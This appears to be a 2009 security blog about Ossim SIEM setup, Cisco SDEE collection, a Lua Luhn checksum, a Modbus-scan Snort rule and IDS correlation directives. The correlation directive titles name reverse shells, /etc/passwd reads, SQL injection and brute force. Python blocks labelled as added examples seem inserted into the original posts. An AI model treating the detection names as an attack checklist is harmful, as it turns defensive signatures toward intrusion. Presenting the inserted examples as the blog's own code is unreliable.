  • Cisco Network Detection Systems (IPS)
  • Cisco Switch IDS
  • Cisco IOS routers with Inline Intrusion Prevention System (IPS) functions
  • Cisco IDS modules for routers
  • Cisco PIX Firewalls
  • Cisco Catalyst 6500 Series firewall services modules (FWSMs)
  • Cisco Management Center for Cisco security agents
  • CiscoWorks Monitoring Center for Security servers

    This protocol replaces the Remote Data Exchange Protocol (RDEP).

    Ossim can collect via SDEE and supports inventory correlation (OS correlation).

    Configuration:

    - Updating plugin sids with the latest IPS signature update package:

    If you have your own update package from your vendor, you can populate the Ossim database with the new signatures.

    To update plugin sid information, go to /usr/share/ossim/scripts/:

    mac-jaime:scripts$ python createCiscoIPSSidmap.py IOS-S416-CLI.pkg.xml
    DELETE FROM plugin WHERE id = "1597";
    
    DELETE FROM plugin_sid where plugin_id = "1597";
    
    INSERT INTO plugin (id, type, name, description) VALUES (1597, 1, 'Cisco-IPS', 'Cisco Intrusion Prevention System');
    
    INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 5986, NULL, NULL, 'Cisco-IPS: Microsoft GDI+ GIF Parsing Vulnerability', 3, 4);
    INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 5984, NULL, NULL, 'Cisco-IPS: IE COM Object Code Execution', 3, 4);
    INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 5985, NULL, NULL, 'Cisco-IPS: Quicktime RTSP Content-Type  Excessive Length', 3, 4);
    INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 19159, NULL, NULL, 'Cisco-IPS: Green Dam Youth Escort Software Update Check', 1, 4);
    INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, priority, reliability) VALUES (1597, 19401, NULL, NULL, 'Cisco-IPS: Microsoft Publisher File Parsing Vulnerability', 3, 4);
    ...
    ...
    

    The script generates the SQL needed to update the Ossim database. To insert it:

    mac-jaime:scripts$ python createCiscoIPSSidmap.py IOS-S416-CLI.pkg.xml > sdee.sql
    mac-jaime:scripts$ ossim-db < sdee.sql
    

    If you want to update cross-correlation information:

    mac-jaime:scripts$ python ciscoIPSOsMap.py IOS-S416-CLI.pkg.xml
    
    replace into plugin_reference values (1597, 1109, 3001, 3);
    replace into plugin_reference values (1597, 1109, 3001, 3);
    replace into plugin_reference values (1597, 1109, 3001, 3);
    replace into plugin_reference values (1597, 1109, 3001, 3);
    replace into plugin_reference values (1597, 2156, 3001, 1);
    replace into plugin_reference values (1597, 2157, 3001, 3);
    replace into plugin_reference values (1597, 2157, 3001, 3);
    replace into plugin_reference values (1597, 2157, 3001, 3);
    ...
    ...
    
    mac-jaime:scripts$ python ciscoIPSOsMap.py IOS-S416-CLI.pkg.xml > sdee-os.sql
    mac-jaime:scripts$ ossim-db < sdee-os.sql
    

    Remember to restart ossim-server in order to update Ossim server cache.
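    As an added example (not the Ossim project's createCiscoIPSSidmap.py), the following Python builds the same statement sequence shown above from a signature list. The real IOS-S416-CLI.pkg.xml schema is not shown in this post, so parse_signatures() reads a constructed placeholder layout, and the severity-to-priority mapping is an assumption; both would be adapted to the real package.

```python
"""Generate the Ossim plugin / plugin_sid SQL for a Cisco IPS signature set.

Added example, not the Ossim project's createCiscoIPSSidmap.py. The real
IOS-*.pkg.xml schema is not shown in the post, so parse_signatures() reads a
placeholder layout; the severity -> priority mapping is an assumption too.
"""
import xml.etree.ElementTree as ET

PLUGIN_ID = 1597  # Cisco-IPS plugin id used by Ossim (from the post)

# Assumed mapping; the post only shows priorities 3 and 1 being emitted.
PRIORITY = {"high": 3, "medium": 2, "low": 1, "informational": 1}

# Constructed sample in the placeholder layout, NOT a real Cisco package.
SAMPLE_XML = """<signatures>
  <signature id="5986" severity="high">Microsoft GDI+ GIF Parsing Vulnerability</signature>
  <signature id="19159" severity="informational">Green Dam Youth Escort Software Update Check</signature>
  <signature id="4242" severity="medium">O'Reilly Test Signature</signature>
</signatures>"""


def parse_signatures(xml_text):
    """Return (sid, severity, name) tuples from the placeholder XML layout."""
    root = ET.fromstring(xml_text)
    return [(int(s.get("id")), s.get("severity", "low"), (s.text or "").strip())
            for s in root.iter("signature")]

def sql_quote(value):
    """Escape a value for a single-quoted SQL literal (names may contain ')."""
    return "'" + value.replace("\\", "\\\\").replace("'", "''") + "'"

def generate_sidmap(signatures, plugin_id=PLUGIN_ID, reliability=4):
    """Emit the statement sequence the post shows: wipe, re-create, insert sids."""
    out = [
        'DELETE FROM plugin WHERE id = "%d";' % plugin_id,
        'DELETE FROM plugin_sid where plugin_id = "%d";' % plugin_id,
        "INSERT INTO plugin (id, type, name, description) VALUES "
        "(%d, 1, 'Cisco-IPS', 'Cisco Intrusion Prevention System');" % plugin_id,
    ]
    for sid, severity, name in signatures:
        prio = PRIORITY.get(severity.lower(), 1)
        out.append(
            "INSERT INTO plugin_sid (plugin_id, sid, category_id, class_id, name, "
            "priority, reliability) VALUES (%d, %d, NULL, NULL, %s, %d, %d);"
            % (plugin_id, sid, sql_quote("Cisco-IPS: " + name), prio, reliability))
    return out

if __name__ == "__main__":
    print("\n".join(generate_sidmap(parse_signatures(SAMPLE_XML))))
```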

    - Configuring Ossim Agent to collect from an SDEE-capable device:

    Add the sdee reference to /etc/ossim/agent/config.cfg

    Edit /etc/ossim/agent/plugins/cisco-ips.cfg:

    [DEFAULT]
    plugin_id=1597
    
    [config]
    type=detector
    enable=yes
    
    source=sdee
    source_ip=
    user=
    password=
    sleep=5
    
    process=
    start=no
    stop=no
    

    Insert your source_ip, user and password data.

    Restart the ossim agent and it should begin receiving data from the SDEE device.

    - Common problems:

    When you begin a session with an SDEE device, it provides you with a Subscription ID. If the device closes the connection or you lose connectivity, you sometimes have to close that session before you can continue collecting from the device.

    Ossim Agent does this automatically, but if for some reason it can't, you should close the session manually.

    You will find the latest Subscription ID provided in /etc/ossim/agent/sdee_sid.data

    Configure your device credentials on /usr/share/ossim/scripts/closeSDEEsession.py and execute:

    mac-jaime:scripts$ python /usr/share/ossim/scripts/closeSDEEsession.py SubscriptionID
    

    This should close the last session. If you still have problems, list the last Subscription IDs used with:

    mac-jaime:scripts$ grep subs /var/log/ossim/agent.log
    

    posted at: 11:49 | path: /Ossim | permanent link to this entry | 0 comments |



    Lua: LUHN checksum algorithm Lua implementation
    Sat, 12 Sep 2009

    I have written a Lua function that implements the LUHN checksum algorithm (requires bitlib). The algorithm checks that a sequence of digits has a valid credit card checksum. Here is the code:

    local bit = require("bit")            -- bitlib (Lua 5.1 bit operations)
    local band, bxor = bit.band, bit.bxor
    
    -- Returns true when the digit string passes the Luhn check.
    function checksum(card)
    	local num = 0
    	local nDigits = card:len()
    	local odd = band(nDigits, 1)
    	
    	for count = 0, nDigits - 1 do
    		local digit = tonumber(string.sub(card, count + 1, count + 1))
    		if digit == nil then
    			return false              -- non-digit character: not a valid number
    		end
    		
    		-- Double every second digit counted from the right (the check digit excluded).
    		if bxor(band(count, 1), odd) == 0 then
    			digit = digit * 2
    		end
    		
    		if digit > 9 then
    			digit = digit - 9
    		end
    		
    		num = num + digit
    	end
    	return (num % 10) == 0
    end
    

    posted at: 19:51 | path: /Lua | permanent link to this entry | 0 comments |



    Ossim: 0-day in Microsoft IIS 5/6 FTP
    Tue, 01 Sep 2009

    A 0-day exploit for Microsoft IIS 5/6 FTP was recently published on Milw0rm, and HD Moore is porting the bug to Metasploit.

    Alienvault's feed customers are protected with the directive released today:
  • 45046: AV Possible 0day IIS FTP Exploit against DST_IP

    http://isc.sans.org/diary.html?storyid=7039

    UPDATE:

    We already had coverage with two directives present in the Alienvault Professional Feed:

  • 45024: AV Possible FTP Exploit attempt against DST_IP
  • 45025: AV Possible FTP Exploit attempt against DST_IP (FTP preprocessor)

    posted at: 16:37 | path: /Ossim | permanent link to this entry | 0 comments |



    Infocon raised to yellow for Excel Activex vulnerability
    Tue, 14 Jul 2009

    Microsoft has released an advisory related to the Office Web Components ActiveX control. The ISC has raised the Infocon to yellow due to active exploitation of the vulnerability from several .cn domains.

    Alienvault's feed customers are protected and covered with these directives:
  • 45050: AV Possible Malicious Server exploiting Excel ActiveX Client against DST_IP (CVE-2009-1136)
  • 45051: AV Possible Excel ActiveX Client side attack detected against SRC_IP (CVE-2009-1136)
  • 45052: AV Possible Excel ActiveX Client Side Attack against DST_IP from a compromised host (CVE-2009-1136)

    http://isc.sans.org/diary.html?storyid=6778

    http://www.microsoft.com/technet/security/advisory/973472.mspx

    Contact our Sales Team for more information about Alienvault Professional Feed. sales@alienvault.com

    posted at: 08:24 | path: /Ossim | permanent link to this entry | 0 comments |



    Ossim: 0-day in Microsoft DirectShow
    Tue, 07 Jul 2009

    A 0-day exploit in the Microsoft Video ActiveX Control is being exploited by malicious sites. Many people are covering this vulnerability, and it seems the exploit will be widely deployed.

    Alienvault's feed customers are protected and covered with these directives:
  • 45046: AV Possible MSVidCtl Client side attack detected against SRC_IP (KB-972890)
  • 45047: AV Possible Malicious Server exploiting MSVidCt against DST_IP (KB-972890)
  • 45048: AV Possible MSVidCt Client Side Attack against DST_IP from a compromised host (KB-972890)
  • 45049: AV Possible MSVidCtl Client side attack detected against SRC_IP (KB-972890) 2

    http://isc.sans.org/diary.html?storyid=6733

    http://www.microsoft.com/technet/security/advisory/972890.mspx

    Contact our Sales Team for more information about Alienvault Professional Feed. sales@alienvault.com

    posted at: 12:46 | path: /Ossim | permanent link to this entry | 0 comments |



    sobek-hids: Host Monitoring System
    Sat, 20 Jun 2009

    I've just created a Google Code project with some code I wrote some time ago. Sobek-Hids is a Python-based host IDS capable of monitoring:

  • Registry Changes
  • File Activity
  • Process Creation
  • Printing Jobs
  • External Drives (USB Disk Plugs)
  • Shared Resources
  • Windows Accounts
  • Logon
  • Firewall Changes

    I hope I will have the time to continue and improve this couple of scripts.

    You can find it at sobek-hids

    posted at: 20:30 | path: /General | permanent link to this entry | 0 comments |



    Snort: Rule to detect Modbus device fingerprinting
    Tue, 21 Apr 2009

    I've just published a Snort rule to detect SCADA Modbus device fingerprinting tools like modscan:

    alert tcp any any -> any 502 (msg:"ET SCAN Modbus Scanning detected"; content:"|00 00 00 00 00 02|"; depth:6; threshold: type both, track by_src, count 100, seconds 10; classtype:bad-unknown; reference:url,code.google.com/p/modscan/; reference:url,www.rtaautomation.com/modbustcp/; sid:2009286; rev:1;)
    

    You can find it at Emerging Threats
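    As an added example (not the Emerging Threats rule itself nor code from this post), the following Python replays the rule's logic offline: it decodes the MBAP header that the content match covers and applies the same threshold (type both, track by_src, count 100, seconds 10) over constructed packet tuples.

```python
"""Modbus-scan rule replayed in Python (added example, not the ET rule itself).

Mirrors content:"|00 00 00 00 00 02|"; depth:6 and threshold: type both,
track by_src, count 100, seconds 10: alert once per window after 100 matches."""
import struct
from collections import defaultdict

PATTERN = b"\x00\x00\x00\x00\x00\x02"  # MBAP: transaction 0, protocol 0, length 2

def parse_mbap(payload):
    """Decode the 7-byte Modbus/TCP MBAP header plus the function code.
    length == 2 means unit id + function code with no data, i.e. a bare
    request such as Report Slave ID (0x11), the kind of probe a scanner sends."""
    if len(payload) < 8:
        return None
    keys = ("trans_id", "proto_id", "length", "unit_id", "function")
    return dict(zip(keys, struct.unpack(">HHHBB", payload[:8])))

def rule_matches(payload):
    """content match with depth:6: only the first six bytes are inspected."""
    return payload[:6] == PATTERN

class ScanThreshold:
    """threshold: type both, track by_src, count N, seconds S."""
    def __init__(self, count=100, seconds=10):
        self.count, self.seconds = count, seconds
        self.state = defaultdict(lambda: {"start": None, "n": 0, "alerted": False})

    def observe(self, src_ip, ts):
        """Return True exactly when Snort would raise the alert for this source."""
        s = self.state[src_ip]
        if s["start"] is None or ts - s["start"] >= self.seconds:
            s.update(start=ts, n=0, alerted=False)  # open a new time window
        s["n"] += 1
        if s["n"] >= self.count and not s["alerted"]:
            s["alerted"] = True
            return True
        return False

def run(packets, count=100, seconds=10):
    """packets: (timestamp, src_ip, dst_port, payload) tuples. Returns alerts."""
    th = ScanThreshold(count, seconds)
    return [(ts, src) for ts, src, dport, pl in packets
            if dport == 502 and rule_matches(pl) and th.observe(src, ts)]

# Constructed sample: 100 Report-Slave-ID probes from one host within two seconds.
SAMPLE = [(i * 0.02, "10.0.0.5", 502, PATTERN + b"\x01\x11") for i in range(100)]
```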

    posted at: 15:55 | path: /Scada Security | permanent link to this entry | 0 comments |



    Ntop: Testing l7-filter protocol detection patterns
    Sun, 12 Apr 2009

    I've written a little script to quickly test the l7-filter protocol patterns used by ntop to detect protocol usage.

    You have to install Scapy. I've included some patterns from Ntop; put your own in the l7-patterns directory.

    You could read a pcap or capture from an interface.

    Examples:

    root@ubuntu:~/panalyzer# python l7Match.py -f http1.pcap
    http
    74.125.43.83 -> 192.168.1.131
    
    root@ubuntu:~/proyectos/panalyzer# python l7Match.py -i eth0
    ssl
    88.221.225.51 -> 192.168.1.128
    ssl
    192.168.1.128 -> 88.221.225.51
    ssl
    88.221.225.51 -> 192.168.1.128
    ssl
    192.168.1.128 -> 88.221.225.51
    
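    An added example, not the l7Match.py script from this post and not using Scapy: a pure-Python tester for l7-filter .pat files (comment lines, then the protocol name, then the regex, matched case-insensitively against the first bytes of a flow), run over constructed flows. The two pattern bodies are constructed stand-ins, not Ntop's real patterns.

```python
"""Minimal l7-filter pattern tester in pure Python (offline, no Scapy).

Added example, not the l7Match.py script from the post. An l7-filter .pat
file carries '#' comment lines, then the protocol name on the first
non-comment line and the regular expression on the next one; the regex is
matched case-insensitively against the first application-data bytes of a
flow. The two pattern bodies below are constructed stand-ins for the real
ntop/l7-filter patterns.
"""
import re

# Constructed .pat file contents, keyed by filename (stand-ins for l7-patterns/*.pat).
PAT_FILES = {
    "http.pat": "# http - constructed stand-in, not the l7-filter pattern\nhttp\n"
                "http/(0\\.9|1\\.0|1\\.1)[\\x09-\\x0d ][1-5][0-9][0-9]|"
                "^(get|post|head) [^\\r\\n]* http/[01]\\.[019]",
    "ssl.pat": "# ssl - TLS/SSLv3 handshake record, constructed stand-in\nssl\n"
               "^\\x16\\x03[\\x00-\\x03]..\\x01",
}


def parse_pat(text):
    """Return (protocol_name, compiled_regex) from one .pat file body."""
    lines = [ln.strip() for ln in text.splitlines()
             if ln.strip() and not ln.lstrip().startswith("#")]
    return lines[0], re.compile(lines[1], re.IGNORECASE | re.DOTALL)


def load_patterns(files=PAT_FILES):
    return [parse_pat(body) for body in files.values()]


def classify(payload, patterns=None, max_bytes=2048):
    """Return the first protocol whose pattern matches the flow's leading bytes."""
    patterns = load_patterns() if patterns is None else patterns
    # latin-1 maps every byte to one code point, so \xNN classes match raw bytes.
    data = payload[:max_bytes].decode("latin-1")
    for name, regex in patterns:
        if regex.search(data):
            return name
    return None


# Constructed flows: an HTTP response, the start of a TLS 1.0 ClientHello, an SSH banner.
HTTP_FLOW = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"
TLS_FLOW = b"\x16\x03\x01\x00\x5c\x01\x00\x00\x58\x03\x01" + b"\x00" * 32
SSH_FLOW = b"SSH-2.0-OpenSSH_5.1p1\r\n"
```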

    posted at: 19:00 | path: /Ossim | permanent link to this entry | 0 comments |



    April 1st, Conficker day
    Tue, 31 Mar 2009

    Tomorrow Conficker will activate a P2P system to coordinate with other infected machines over TCP and UDP. We've published a directive to detect the P2P behaviour.

    Download Directive

    posted at: 14:55 | path: /Ossim | permanent link to this entry | 2 comments |



    Ossim: Shellcode Detection and Analysis
    Tue, 10 Mar 2009

    I'm glad to announce a new feature we have added to the forensic console. We use libemu for shellcode detection and analysis, to help with forensic analysis and reduce false positives. An example:



    posted at: 14:35 | path: /Ossim | permanent link to this entry | 0 comments |



    Ossim: New Directives
    Wed, 04 Mar 2009

    I've just updated the public CVS with some new directives as part of the effort we are making to improve the upcoming installer:

    Attacks:
  • Possible Successful Attack: Reverse Shell Access to the System
  • Possible POP3 Bruteforce against SRC_IP
  • Possible FTP Bruteforce against SRC_IP
  • Command execution against webserver on DST_IP
  • File /etc/passwd access on DST_IP
  • Possible SQL injection attempt against DST_IP
  • Possible attack against DST_IP (Symantec Remote Management RTVScan Exploit)
  • Possible sa account bruteforce against SRC_IP (SQL Server)
  • Possible VNC bruteforce against SRC_IP
  • Possible attack against DST_IP (Microsoft Server Service related attack)
  • Too many Cisco Firewall dropped events with destination DST_IP

    Worms:
  • Possible Worm Infection against DST_IP
  • Possible Worm Infection against DST_IP via DCOM RPC vulnerability
  • Possible Worm Infection against DST_IP via Kill-Bill ASN1 vulnerability
  • Possible Worm Infection against DST_IP via Lsasrv.dll RPC vulnerability
  • Possible Worm Infection against DST_IP via WINS vulnerability
  • Possible attack against DST_IP (Microsoft Server Service related attack)
  • Possible worm scanning behavior on port DST_PORT

    Misc:
  • Username gathering at SMTP server DST_IP

    posted at: 17:08 | path: /Ossim | permanent link to this entry | 0 comments |



    Ossim: Cross Correlation Rules Updated
    Tue, 03 Feb 2009

    I've just updated the Ossim cross-correlation rules related to Nessus and Snort; check the CVS!

    The basic rule for cross correlation is: if Snort has detected an attack against an IP, and we know that IP has the corresponding vulnerability, the event's reliability is changed to 10.

    The relationships between Nessus IDs and Snort signatures are stored in the table plugin_reference. If you want to personalize this, you have to insert data into that table; check Personalize Cross Correlation. When a personalized cross-correlation rule matches, the event adds the reliability of the new plugin to the old one.
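    The rule above in working form, as an added example (not Ossim's own server code) that also shows how the plugin_reference rows emitted by ciscoIPSOsMap.py in the SDEE post are consumed. The rows, the vulnerability inventory and the event are constructed, and the personalized mode implements my reading of the last sentence.

```python
"""Cross-correlation of IDS events against a Nessus vulnerability inventory.

Added example of the rule described in the post (and of how the plugin_reference
rows emitted by ciscoIPSOsMap.py are used); it is not Ossim server code.
A plugin_reference row is (plugin_id, plugin_sid, reference_id, reference_sid):
(1597, 1109, 3001, 3) links Cisco-IPS signature 1109 to Nessus (plugin 3001) id 3.
"""

# Constructed rows in plugin_reference layout (3001 is the Nessus plugin id).
PLUGIN_REFERENCE = {
    (1597, 1109, 3001, 3),
    (1597, 2156, 3001, 1),
}

# Constructed inventory: host -> set of (reference_id, reference_sid) it has.
INVENTORY = {
    "192.168.1.10": {(3001, 3)},
    "192.168.1.20": {(3001, 1), (3001, 7)},
}


def vulnerabilities_for(plugin_id, sid, references=PLUGIN_REFERENCE):
    """All vulnerability references tied to one IDS plugin/sid pair."""
    return {(ref_id, ref_sid) for p, s, ref_id, ref_sid in references
            if p == plugin_id and s == sid}


def cross_correlate(event, inventory=INVENTORY, references=PLUGIN_REFERENCE,
                    personalized_reliability=None):
    """Apply the rule: if the attacked host is known to have a vulnerability the
    event maps to, reliability becomes 10. With personalized_reliability set
    (my reading of the post's last sentence), the referenced plugin's
    reliability is added to the existing one instead, capped at 10."""
    refs = vulnerabilities_for(event["plugin_id"], event["plugin_sid"], references)
    matched = refs & inventory.get(event["dst_ip"], set())
    result = dict(event, cross_correlated=bool(matched))
    if matched and personalized_reliability is None:
        result["reliability"] = 10
    elif matched:
        result["reliability"] = min(10, event["reliability"] + personalized_reliability)
    return result
```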
    
    
    

    posted at: 14:59 | path: /Ossim | permanent link to this entry | 0 comments |



    Made with PyBlosxom